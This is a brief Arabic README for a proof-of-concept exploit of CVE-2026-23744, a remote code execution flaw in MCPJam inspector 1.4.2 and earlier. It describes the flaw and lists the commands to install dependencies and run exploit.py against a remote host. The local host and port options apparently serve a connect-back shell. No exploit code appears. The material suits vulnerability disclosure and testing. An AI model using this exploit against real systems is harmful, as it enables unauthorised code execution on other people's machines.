
CVE-2026-23744 إثبات المفهوم.
MCPJam inspector هي منصة تطوير محلية أولاً لخوادم MCP. الإصدارات <=1.4.2 معرّضة لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE)، والتي تسمح للمهاجم بإرسال طلب HTTP مُصمَّم خصيصًا يؤدي إلى تثبيت خادم MCP، مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE). للحصول على تفاصيل حول الثغرة، راجع المراجع.
$ pip install requests
$ python3 exploit.py [-h] [--lhost LHOST] [--lport LPORT] [--rhost RHOST] [--rport RPORT]
-h, --help اعرض رسالة المساعدة واخرج
--lhost LHOST عنوان IP للمضيف المحلي
--lport LPORT منفذ المضيف المحلي
--rhost RHOST عنوان IP البعيد
--rport RPORT المنفذ البعيد